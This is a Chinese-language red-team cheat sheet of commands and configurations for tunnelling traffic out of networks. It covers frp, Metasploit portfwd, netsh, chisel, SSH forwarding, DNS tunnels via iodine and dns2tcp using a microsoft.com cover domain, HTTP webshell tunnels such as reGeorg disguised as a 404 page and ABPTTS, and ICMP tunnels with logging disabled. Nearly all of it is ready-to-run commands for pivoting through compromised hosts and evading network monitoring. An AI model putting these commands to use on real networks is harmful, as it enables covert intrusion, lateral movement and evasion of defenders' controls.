流量隧道

TCP隧道

Frp

• Server端

[common]
bind_port = 7000
kcp_bind_port = 7000
token = 随机密码
tls_only = true

• 端口转发

#TCP流量 --> Server:3389 --> Client --> Target:22
[common]
server_addr = Server
server_port = 7000
token = 随机密码
tls_enable = true
protocol = tcp/kcp/websocket
disable_custom_tls_first_byte = true

[HTTP]
type = tcp
local_ip = Target
local_port = 22
remote_port = 3389
use_compression = true

• Socks代理

#Socks流量 --> Server:3389 --> Client --> 动态转发
[common]
server_addr = Server
server_port = 7000
token = 随机密码
tls_enable = true
protocol = tcp/kcp/websocket
disable_custom_tls_first_byte = true

[Socks5]
type = tcp
remote_port = 3389
plugin = socks5
plugin_user = admin
plugin_passwd = 99999
use_compression = true

MSF

• 本地转发

#TCP流量 --> Local:8080 --> Remote --> Target:8888
portfwd add -l 8080 -r Target -p 8888

• 远程转发

#TCP流量 --> Remote:8080 --> Local --> Target:8888
portfwd add -R -p 8080 -L Target -l 8888

Netsh

• 查看规则

netsh interface portproxy show all

• 添加规则

#TCP流量 --> Server:8080 --> Target:8888
netsh interface portproxy set v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=Target connectport=8888

• 删除规则

netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8080

Chisel

• 本地转发

#TCP流量 --> Client:8080 --> Server --> Target:8888
chisel server --auth admin:99999 -p 7000
chisel client --auth admin:99999 Server:7000 8080:Target:8888

• 远程转发

#TCP流量 --> Server:8080 --> Client --> Target:8888
chisel server --auth admin:99999 -p 7000 --reverse
chisel client --auth admin:99999 Server:7000 R:8080:Target:8888

• 本地Socks

#Socks流量 --> Client:9999 --> Server --> 动态转发
chisel server --auth admin:99999 -p 7000 --socks5
chisel client --auth admin:99999 Server:7000 9999:socks

• 远程Socks

#Socks流量 --> Server(127.0.0.1):9999 --> Client --> 动态转发
chisel server --auth admin:99999 -p 7000 --reverse
chisel client --auth admin:99999 Server:7000 R:9999:socks

SSH隧道

• 本地转发

#TCP流量 --> 127.0.0.1:8080 --> Server --> Target:8888
ssh -CNf -L 127.0.0.1:8080:Target:8888 root@Server

• 远程转发

#TCP流量 --> Server:8080 --> Client --> Target:8888
ssh -CNf -R 8080:Target:8888 root@Server

• 动态转发

#Socks流量 --> 127.0.0.1:9999 --> Server --> 动态转发
ssh -CNf -D 127.0.0.1:9999 root@Server

DNS隧道

Iodine

• Server端

iodined -P 随机密码 172.16.0.0/24 microsoft.com

• Client端

#虚拟网卡 --> DNS流量 --> Server --> 172.16.0.1
iodine -r -P 随机密码 [服务端IP] microsoft.com

Dns2tcp

• Server端

#dns2tcpd -f server.config
listen = 0.0.0.0
port = 53
user = nobody
key = 随机密码
chroot = /tmp
domain = microsoft.com
resources = http:Target:8888

• Client端

#TCP流量 --> Client:8080 --> DNS流量 --> Server --> Target:8888
dns2tcpc -c -l 8080 -z microsoft.com -r http -k 随机密码 [服务端IP]

HTTP隧道

ABPTTS

• 有效载荷

python2 abpttsfactory.py -o server

• 端口转发

#TCP流量 --> 127.0.0.1:8080 --> Server --> Target:8888
python2 abpttsclient.py -c server/config.txt -u http://example.com/abptts.jsp -f 127.0.0.1:8080/Target:8888

reGeorg

• 有效载荷

python3 neoreg.py generate -k 随机密码 --file 404.html --httpcode 404

• 端口转发

#TCP流量 --> 127.0.0.1:8080 --> Server --> Target:8888
python3 neoreg.py -s -k 随机密码 -u http://example.com/tunnel.php -p 8080 -t Target:8888

• Socks代理

#Socks流量 --> 127.0.0.1:9999 --> Server --> 动态转发
python3 neoreg.py -s -k 随机密码 -u http://example.com/tunnel.php -l 127.0.0.1 -p 9999

ICMP隧道

PingTunnel

• Server端

pingtunnel -type server -key 随机密码 -nolog 1 -noprint 1

• 端口转发

#TCP流量 --> 127.0.0.1:9999 --> Server --> Target:8888
pingtunnel -type client -key 随机密码 -l 127.0.0.1:9999 -s Server -t Target:8888 -tcp 1 -nolog 1 -noprint 1

• Socks代理

#Socks流量 --> 127.0.0.1:9999 --> Server --> 动态转发
pingtunnel -type client -key 随机密码 -l 127.0.0.1:9999 -s Server -sock5 1 -nolog 1 -noprint 1